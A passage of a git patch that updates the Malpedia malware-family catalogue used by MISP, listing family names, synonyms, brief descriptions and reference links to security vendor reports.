From 125f676d173d413111129a4161d0f3e474bca506 Mon Sep 17 00:00:00 2001 From: Steffen Enders Date: Wed, 10 Oct 2018 17:31:27 +0200 Subject: [PATCH 1/2] Updated malpedia.json to the current state Fetched the new malpedia galaxy cluster from https://malpedia.caad.fkie.fraunhofer.de/api/get/misp - this includes an additional ~120 new families. --- clusters/malpedia.json | 29250 +++++++++++++++++++++------------------ 1 file changed, 15952 insertions(+), 13298 deletions(-) diff --git a/clusters/malpedia.json b/clusters/malpedia.json index ed35fe8..256f76f 100644 --- a/clusters/malpedia.json +++ b/clusters/malpedia.json @@ -1,13300 +1,15954 @@ { - "description": "Malware galaxy based on Malpedia archive.", - "type": "malpedia", - "authors": [ - "Daniel Plohmann", - "Andrea Garavaglia", - "Davide Arcuri" - ], - "values": [ - { - "uuid": "9ee0eb87-7648-4581-b301-7472a48946ad", - "value": "reGeorg", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://sensepost.com/discover/tools/reGeorg/", - "https://github.com/sensepost/reGeorg" - ] - } - }, - { - "uuid": "e6005ce5-3e3d-4dfb-8de7-3da45e89e549", - "value": "Quant Loader", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malwarebreakdown.com/2017/10/10/malvertising-campaign-uses-rig-ek-to-drop-quant-loader-which-downloads-formbook/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/", - "https://blogs.forcepoint.com/security-labs/locky-distributor-uses-newly-released-quant-loader-sold-russian-underground", - "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat", - "https://blog.malwarebytes.com/threat-analysis/2018/03/an-in-depth-malware-analysis-of-quantloader/" - ] - } - }, - { - "uuid": "abd22cec-49ee-431f-a2e6-e4722b3e44bb", - "value": "Unidentified 049 (Lazarus/RAT)", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/" - ] - } - }, - { - "uuid": "31615066-dbff-4134-b467-d97a337b408b", - "value": "HawkEye Keylogger", - "description": "", - "meta": { - "synonyms": [ - "Predator Pain" - ], - "type": [], - "refs": [ - "https://nakedsecurity.sophos.com/2016/02/29/the-hawkeye-attack-how-cybercrooks-target-small-businesses-for-big-money/", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/How-I-Cracked-a-Keylogger-and-Ended-Up-in-Someone-s-Inbox/", - "https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html", - "http://stopmalvertising.com/malware-reports/analysis-of-the-predator-pain-keylogger.html", - "https://researchcenter.paloaltonetworks.com/2015/10/surveillance-malware-trends-tracking-predator-pain-and-hawkeye/" - ] - } - }, - { - "uuid": "96bb088c-7bb7-4a07-a9d7-a3cbb45d5755", - "value": "Kegotip", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "53e94bc9-c8d2-4fb6-9c02-00841e454050", - "value": "Rover", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/" - ] - } - }, - { - "uuid": "a6f481fe-b6db-4507-bb3c-28f10d800e2f", - "value": "Loki", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.checkpoint.com/2017/03/10/preinstalled-malware-targeting-mobile-users/" - ] - } - }, - { - "uuid": "2d07a1bf-1d8d-4f1e-a02f-1a8ff5b76cd1", - "value": "Vermin", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/" - ] - } - }, - { - "uuid": "4d9d0223-32fe-49cf-8608-0e154359528a", - "value": "LokiBot", - "description": "Android banker Trojan with the standard banking capabilities such as overlays, SMS stealing. It also features ransomware functionality. Note, the network traffic is obfuscated the same way as in Android Bankbot.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.threatfabric.com/blogs/lokibot_the_first_hybrid_android_malware.html" - ] - } - }, - { - "uuid": "8faf7592-be5c-44af-b1ca-2bd8caec195d", - "value": "Leash", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/" - ] - } - }, - { - "uuid": "5424d89e-1b7a-4632-987b-67fd27621d6f", - "value": "Unidentified 022 (Ransom)", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "bfa75eb1-1d8d-4127-932f-3b7090a242e9", - "value": "Wonknu", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://labsblog.f-secure.com/2015/11/24/wonknu-a-spy-for-the-3rd-asean-us-summit/" - ] - } - }, - { - "uuid": "df9c8440-b4da-4226-b982-e510d06cf246", - "value": "Unidentified 044", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "6b6cf608-cc2c-40d7-8500-afca3e35e7e4", - "value": "Wipbot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf" - ] - } - }, - { - "uuid": "2894aee2-e0ec-417a-811e-74a68ab967b2", - "value": "Remcos", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://malware-traffic-analysis.net/2017/12/22/index.html", - "https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2", - "https://krabsonsecurity.com/2018/03/02/analysing-remcos-rats-executable/", - "https://myonlinesecurity.co.uk/fake-order-spoofed-from-finchers-ltd-sankyo-rubber-delivers-remcos-rat-via-ace-attachments/", - "https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/", - "https://secrary.com/ReversingMalware/RemcosRAT/" - ] - } - }, - { - "uuid": "6fb5bfff-4b10-43a4-ad3c-a1578f39e83e", - "value": "CradleCore", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blogs.forcepoint.com/security-labs/cradlecore-ransomware-source-code-sale" - ] - } - }, - { - "uuid": "b0467c03-824f-4071-8668-f056110d2a50", - "value": "Taleret", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html", - "http://contagioexchange.blogspot.com/2013/08/taleret-strings-apt-1.html" - ] - } - }, - { - "uuid": "d327b4d9-e1c8-4c71-b9fe-775d1607e7d4", - "value": "SynFlooder", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] - } - }, - { - "uuid": "782bee33-9f8d-41df-a608-c014bd6a7de1", - "value": "Poweliks Dropper", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.zscaler.com/blogs/research/malvertising-targeting-european-transit-users" - ] - } - }, - { - "uuid": "044849d3-d0de-4f78-b67d-bfbe8dd3a255", - "value": "Vflooder", - "description": "Vflooder floods VirusTotal by infinitely submitting a copy of itself. Some variants apparently also try to flood Twitter. The impact on these services are negligible, but for researchers it can be a nuisance. Most versions are protectd by VMProtect.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.malwarebytes.com/threat-analysis/2017/10/analyzing-malware-by-api-calls/" - ] - } - }, - { - "uuid": "79a7203a-6ea5-4c39-abd4-faa20cf8821a", - "value": "Cerber", - "description": "A prolific ransomware which originally added \".cerber\" as a file extension to encrypted files. Has undergone multiple iterations in which the extension has changed. Uses a very readily identifiable set of of UDP activity to checkin and report infections. Primarily uses TOR for payment information.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.trendmicro.com/trendlabs-security-intelligence/cerber-starts-evading-machine-learning/", - "https://blog.malwarebytes.com/threat-analysis/2016/03/cerber-ransomware-new-but-mature/", - "https://www.virusbulletin.com/virusbulletin/2017/12/vb2017-paper-nine-circles-cerber/" - ] - } - }, - { - "uuid": "a4b9c526-42d0-4de9-ab8e-e78f99655d11", - "value": "SysGet", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/" - ] - } - }, - { - "uuid": "67fc358f-da6a-4f01-be23-44bc97319127", - "value": "Shim RAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf" - ] - } - }, - { - "uuid": "f7aae3bc-4a46-4334-a28e-35650289dd1a", - "value": "Uroburos", - "description": "", - "meta": { - "synonyms": [ - "Snake" - ], - "type": [], - "refs": [] - } - }, - { - "uuid": "80447111-8085-40a4-a052-420926091ac6", - "value": "AndroRAT", - "description": "Androrat is a remote administration tool developed in Java Android for the client side and in Java/Swing for the Server. The name Androrat is a mix of Android and RAT (Remote Access Tool). It has been developed in a team of 4 for a university project. The goal of the application is to give the control of the android system remotely and retrieve informations from it.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://github.com/DesignativeDave/androrat", - "https://hotforsecurity.bitdefender.com/blog/possibly-italy-born-android-rat-reported-in-china-find-bitdefender-researchers-16264.html" - ] - } - }, - { - "uuid": "cb5bad79-707c-493d-8a2b-4c0be38301c5", - "value": "CodeKey", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf" - ] - } - }, - { - "uuid": "5a78ec38-8b93-4dde-a99e-0c9b77674838", - "value": "TinyNuke", - "description": "TinyNuke is a fully-fledged banking trojan including HiddenDesktop/VNC server and a reverse socks4 server. The author destroyed his own reputation on hacker forums by promoting his development too aggressively. As a displacement activity, he published his source code on Github. XBot is an off-spring of TinyNuke, but very similar to its ancestor.", - "meta": { - "synonyms": [ - "Xbot", - "MicroBankingTrojan", - "NukeBot", - "Nuclear Bot" - ], - "type": [], - "refs": [ - "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4596", - "https://forums.juniper.net/t5/Threat-Research/Nukebot-Banking-Trojan-targeting-people-in-France/ba-p/326702", - "https://www.bitsighttech.com/blog/break-out-of-the-tinynuke-botnet", - "https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html", - "https://securityintelligence.com/the-nukebot-trojan-a-bruised-ego-and-a-surprising-source-code-leak/", - "https://securelist.com/the-nukebot-banking-trojan-from-rough-drafts-to-real-threats/78957/", - "https://www.arbornetworks.com/blog/asert/dismantling-nuclear-bot/" - ] - } - }, - { - "uuid": "ccde5b0d-fe13-48e6-a6f4-4e434ce29371", - "value": "UACMe", - "description": "A toolkit maintained by hfiref0x which incorporates numerous UAC bypass techniques for Windows 7 - Windows 10. Typically, components of this tool are stripped out and reused by malicious actors.", - "meta": { - "synonyms": [ - "Akagi" - ], - "type": [], - "refs": [ - "https://github.com/hfiref0x/UACME" - ] - } - }, - { - "uuid": "271752e3-67ca-48bc-ade2-30eec11defca", - "value": "RadRAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://labs.bitdefender.com/2018/04/radrat-an-all-in-one-toolkit-for-complex-espionage-ops/" - ] - } - }, - { - "uuid": "212d1ed7-0519-412b-a1ce-56046ca93372", - "value": "SNEEPY", - "description": "", - "meta": { - "synonyms": [ - "ByeByeShell" - ], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/" - ] - } - }, - { - "uuid": "d1597713-fe7a-45bd-8b59-1a13c7e097d8", - "value": "Misdat", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf" - ] - } - }, - { - "uuid": "ac4fbbb0-9a21-49ce-be82-e44cb02a7819", - "value": "DreamBot", - "description": "2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n2014 Dreambot (Gozi ISFB variant)\r\n\r\nIn 2014, a variant of Gozi ISFB was developed. Mainly, the dropper performs additional anti-vm checks (vmware, vbox, qemu), while the actual bot-dll remains unchanged in most parts. New functionality, such as TOR support, was added though and often, the Fluxxy fast-flux network is used.\r\n\r\nSee win.gozi for additional historical information.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://lokalhost.pl/gozi_tree.txt", - "https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality" - ] - } - }, - { - "uuid": "838e2a3a-c4cb-4bee-b07f-c97b143c68d6", - "value": "OneKeyLocker", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/malwrhunterteam/status/1001461507513880576" - ] - } - }, - { - "uuid": "2637315d-d31e-4b64-aa4b-2fc265b0a1a3", - "value": "HesperBot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "d9e6adf2-4f31-48df-a7ef-cf25d299f68c", - "value": "GlassRAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://community.rsa.com/community/products/netwitness/blog/2015/11/25/detecting-glassrat-using-security-analytics-and-ecat" - ] - } - }, - { - "uuid": "4ec40af9-0295-4b9a-81ad-b7017a21609d", - "value": "BackSwap", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.welivesecurity.com/2018/05/25/backswap-malware-empty-bank-accounts/", - "https://www.cert.pl/en/news/single/backswap-malware-analysis/" - ] - } - }, - { - "uuid": "ae4aa1ef-4da0-4952-9583-9d47f84edad9", - "value": "CryptoFortress", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.welivesecurity.com/2015/03/09/cryptofortress-mimics-torrentlocker-different-ransomware/", - "https://www.lexsi.com/securityhub/cryptofortress/?lang=en", - "http://malware.dontneedcoffee.com/2015/03/cryptofortress-teeraca-aka.html" - ] - } - }, - { - "uuid": "3eae1764-7ea6-43e6-85a1-b1dd0b4856b8", - "value": "vSkimmer", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.xylibox.com/2013/01/vskimmer.html", - "http://vkremez.weebly.com/cyber-security/-backdoor-win32hesetoxa-vskimmer-pos-malware-analysis", - "https://securingtomorrow.mcafee.com/mcafee-labs/vskimmer-botnet-targets-credit-card-payment-terminals/" - ] - } - }, - { - "uuid": "73806c57-cef8-4f7b-a78b-7949ef83b2c2", - "value": "GlobeImposter", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.bleepingcomputer.com/news/security/new-doc-globeimposter-ransomware-variant-malspam-campaign-underway/", - "https://blog.fortinet.com/2017/08/05/analysis-of-new-globeimposter-ransomware-variant", - "https://info.phishlabs.com/blog/globe-imposter-ransomware-makes-a-new-run", - "https://isc.sans.edu/diary/23417", - "https://blog.ensilo.com/globeimposter-ransomware-technical", - "https://www.acronis.com/en-us/blog/posts/globeimposter-ransomware-holiday-gift-necurs-botnet" - ] - } - }, - { - "uuid": "0e435b5d-37df-47cc-a1c4-1afb82df83d1", - "value": "Unidentified 003", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "70f6c71f-bc0c-4889-86e3-ef04e5b8415b", - "value": "Daserf", - "description": "", - "meta": { - "synonyms": [ - "Nioupale", - "Muirim" - ], - "type": [], - "refs": [ - "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", - "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", - "https://researchcenter.paloaltonetworks.com/2017/07/unit42-tick-group-continues-attacks/" - ] - } - }, - { - "uuid": "9de41613-7762-4a88-8e9a-4e621a127f32", - "value": "Morphine", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "c1144eb8-a2bc-48d7-b0fb-18f124c1f8d9", - "value": "MajikPos", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.trendmicro.com/trendlabs-security-intelligence/majikpos-combines-pos-malware-and-rats/" - ] - } - }, - { - "uuid": "5f427b3a-7162-4421-b2cd-e6588d518448", - "value": "ATMitch", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/blog/sas/77918/atmitch-remote-administration-of-atms/" - ] - } - }, - { - "uuid": "e3adbb0d-6d6e-4686-8108-ee76452339bf", - "value": "ScanPOS", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.morphick.com/resources/news/scanpos-new-pos-malware-being-distributed-kronos", - "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware" - ] - } - }, - { - "uuid": "05252643-093b-4070-b62f-d5836683a9fa", - "value": "Quasar RAT", - "description": "Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/", - "https://github.com/quasar/QuasarRAT/tree/master/Client", - "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/", - "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", - "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf?platform=hootsuite", - "https://ti.360.net/blog/articles/analysis-of-apt-c-09-target-china/", - "https://twitter.com/malwrhunterteam/status/789153556255342596", - "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments" - ] - } - }, - { - "uuid": "48cdcbcf-38a8-4c68-a85e-42989ca28861", - "value": "Icefog", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.kz-cert.kz/page/502" - ] - } - }, - { - "uuid": "d073f9e5-8aa8-4e66-ba47-f332759199a2", - "value": "Unidentified 037", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "1c27b1a3-ea2a-45d2-a982-12e1509aa4ad", - "value": "Glasses", - "description": "", - "meta": { - "synonyms": [ - "Wordpress Bruteforcer" - ], - "type": [], - "refs": [ - "https://forum.exploit.in/pda/index.php/t102378.html" - ] - } - }, - { - "uuid": "3c74a04d-583e-40ec-b347-bdfeb534c614", - "value": "ZhCat", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] - } - }, - { - "uuid": "4ff34778-de4b-4f48-9184-4975c8ccc3f3", - "value": "Koler", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/LukasStefanko/status/928262059875213312" - ] - } - }, - { - "uuid": "34c6504b-e947-49d8-a963-62b7594b7ef9", - "value": "Sanny", - "description": "", - "meta": { - "synonyms": [ - "Daws" - ], - "type": [], - "refs": [ - "http://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html" - ] - } - }, - { - "uuid": "6c09cc53-7160-47c6-8df8-3e0d42deb5a6", - "value": "Micrass", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/" - ] - } - }, - { - "uuid": "a673b4fb-a864-4a5b-94ab-3fc4f5606cc8", - "value": "Yahoyah", - "description": "", - "meta": { - "synonyms": [ - "KeyBoy" - ], - "type": [], - "refs": [ - "http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" - ] - } - }, - { - "uuid": "dcd1f76d-5a40-4c58-b01e-a749871fe50b", - "value": "Limitail", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "d3af810f-e657-409c-b821-4b1cf727ad18", - "value": "Bolek", - "description": "", - "meta": { - "synonyms": [ - "KBOT" - ], - "type": [], - "refs": [ - "https://asert.arbornetworks.com/communications-bolek-trojan/", - "http://www.cert.pl/news/11379" - ] - } - }, - { - "uuid": "9c90b876-e94d-4ea5-9f30-fdc6dd6b5aef", - "value": "Dharma", - "description": "", - "meta": { - "synonyms": [ - "Arena", - "Crysis" - ], - "type": [], - "refs": [ - "https://www.bleepingcomputer.com/news/security/new-arena-crysis-ransomware-variant-released/" - ] - } - }, - { - "uuid": "026d638b-cc51-4eff-97fc-d61215a1a70a", - "value": "ModPOS", - "description": "", - "meta": { - "synonyms": [ - "straxbot" - ], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2015/11/modpos.html", - "https://twitter.com/physicaldrive0/status/670258429202530306" - ] - } - }, - { - "uuid": "878ab9fc-a526-43bd-81ac-3eba14ba0f1f", - "value": "Unidentified 046", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/DrunkBinary/status/1006534471687004160" - ] - } - }, - { - "uuid": "40fc6f71-75ac-43ac-abd9-c90b0e847999", - "value": "CreativeUpdater", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distributed-via-a-macupdate-hack/", - "https://objective-see.com/blog/blog_0x29.html", - "https://digitasecurity.com/blog/2018/02/05/creativeupdater/" - ] - } - }, - { - "uuid": "1de27925-f94c-462d-acb6-f75822e05ec4", - "value": "Gravity RAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.virusbulletin.com/blog/2018/04/gravityrat-malware-takes-your-systems-temperature/", - "https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html" - ] - } - }, - { - "uuid": "f4cac204-3d3f-4bb6-84bd-fc27b2f5158c", - "value": "SOUNDBITE", - "description": "", - "meta": { - "synonyms": [ - "denis" - ], - "type": [], - "refs": [ - "https://attack.mitre.org/wiki/Software/S0157", - "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html" - ] - } - }, - { - "uuid": "827490bf-19b8-4d14-83b3-7da67fbe436c", - "value": "Datper", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", - "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", - "http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.html" - ] - } - }, - { - "uuid": "e701b875-8ade-434f-89ff-6c367099bfd8", - "value": "FF RAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.cylance.com/en_us/blog/breaking-down-ff-rat-malware.html" - ] - } - }, - { - "uuid": "dcdd98a7-aad2-4a96-a787-9c4665bbb1b8", - "value": "CycBot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.welivesecurity.com/2011/07/14/cycbot-ready-to-ride/" - ] - } - }, - { - "uuid": "8a789016-5f8d-4cd9-ba96-ba253db42fd8", - "value": "pupy", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations", - "https://blog.cyber4sight.com/2017/02/malicious-powershell-script-analysis-indicates-shamoon-actors-used-pupy-rat/", - "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", - "https://github.com/n1nj4sec/pupy" - ] - } - }, - { - "uuid": "c1b9e8c5-9283-4dbe-af10-45956a446fb7", - "value": "AlphaLocker", - "description": "A new form of ransomware named AlphaLocker that is built by cybercriminals for cybercriminals. Like all incarnations of Ransomware As A Service (RaaS), the AlphaLocker malware program can be purchased and launched by pretty much anyone who wants to get into the ransomware business. What makes AlphaLocker different from other forms of RaaS is its relatively cheap cost. The ransomware can be purchased for just $65 in bitcoin.\r\n\r\nAlphaLocker, also known as Alpha Ransomware, is based on the EDA2 ransomware, an educational project open-sourced on GitHub last year by Turkish researcher Utku Sen. A Russian coder seems to have cloned this repository before it was taken down and used it to create his ransomware, a near-perfect clone of EDA2. The ransomware's author, is said to be paying a great deal of attention to updating the ransomware with new features, so it would always stay ahead of antivirus engines, and evade detection.\r\n\r\nAlphaLocker's encryption process starts when the ransomware contacts its C&C server. The server generates a public and a private key via the RSA-2048 algorithm, sending the public key to the user's computer and saving the private key to its server. On the infected computer, the ransomware generates an AES-256 key for each file it encrypts, and then encrypts this key with the public RSA key, and sent to the C&C server.\r\n\r\nTo decrypt their files, users have to get ahold of the private RSA key which can decrypt the AES-encrypted files found on their computers. Users have to pay around 0.35 Bitcoin (~$450) to get this key, packaged within a nice decrypter.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.cylance.com/an-introduction-to-alphalocker" - ] - } - }, - { - "uuid": "f2b0ffdc-7d4e-4786-8935-e7036faa174d", - "value": "Unidentified 050 (APT32 Profiler)", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://community.riskiq.com/projects/53b4bd1e-dad0-306b-7712-d2a608400c8f", - "https://gist.github.com/9b/141a5c7ab8b4280901722e2cd931b7ef" - ] - } - }, - { - "uuid": "fab34d66-5668-460a-bc0f-250b9417cdbf", - "value": "TURNEDUP", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" - ] - } - }, - { - "uuid": "23398248-a52a-4a7c-af10-262822d33a4e", - "value": "backspace", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" - ] - } - }, - { - "uuid": "44168d77-338d-46ad-a5f6-c17c2b6b0631", - "value": "Devil's Rat", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "92d87656-5e5b-410c-bdb6-bf028324dc72", - "value": "RoyalCli", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://github.com/nccgroup/Royal_APT", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" - ] - } - }, - { - "uuid": "bc1fc21d-80c0-4629-bb18-d5ae1df2a431", - "value": "RapidStealer", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://pwc.blogs.com/cyber_security_updates/2014/09/malware-microevolution.html" - ] - } - }, - { - "uuid": "d238262a-4832-408f-9926-a7174e671b50", - "value": "WaterSpout", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html" - ] - } - }, - { - "uuid": "dd9939a4-df45-4c7c-8a8d-83b40766aacd", - "value": "SuppoBox", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "b96be762-56a0-4407-be04-fcba76c1ff29", - "value": "HiddenTear", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/hidden-tear-project-forbidden-fruit-is-the-sweetest/", - "https://twitter.com/struppigel/status/950787783353884672", - "https://github.com/goliate/hidden-tear" - ] - } - }, - { - "uuid": "d97ae60e-612a-4feb-908a-8c4d32e9d763", - "value": "Brambul", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.us-cert.gov/ncas/alerts/TA18-149A", - "https://www.us-cert.gov/ncas/analysis-reports/AR18-149A", - "https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/" - ] - } - }, - { - "uuid": "d31f1c73-d14b-41e2-bb16-81ee1d886e43", - "value": "SHARPKNOT", - "description": "", - "meta": { - "synonyms": [ - "Bitrep" - ], - "type": [], - "refs": [ - "https://eromang.zataz.com/tag/agentbase-exe/", - "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf" - ] - } - }, - { - "uuid": "da2969f2-01e9-4ca8-b2f3-5fc9a9891d57", - "value": "StrongPity", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/physicaldrive0/status/786293008278970368", - "https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfisher/", - "https://securelist.com/blog/research/76147/on-the-strongpity-waterhole-attacks-targeting-italian-and-belgian-encryption-users/", - "https://citizenlab.ca/2018/03/bad-traffic-sandvines-packetlogic-devices-deploy-government-spyware-turkey-syria/" - ] - } - }, - { - "uuid": "c9d78931-318c-4b34-af33-c90f6612a4f1", - "value": "Furtim", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://sentinelone.com/blogs/sfg-furtims-parent/", - "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4341&sid=af76b944112a234fa933cc934d21cd9f" - ] - } - }, - { - "uuid": "add29684-94b7-4c75-a43b-d039c4b76158", - "value": "pgift", - "description": "Information gathering and downloading tool used to deliver second stage malware to the infected system", - "meta": { - "synonyms": [ - "ReRol" - ], - "type": [], - "refs": [ - "https://community.fireeye.com/external/1093" - ] - } - }, - { - "uuid": 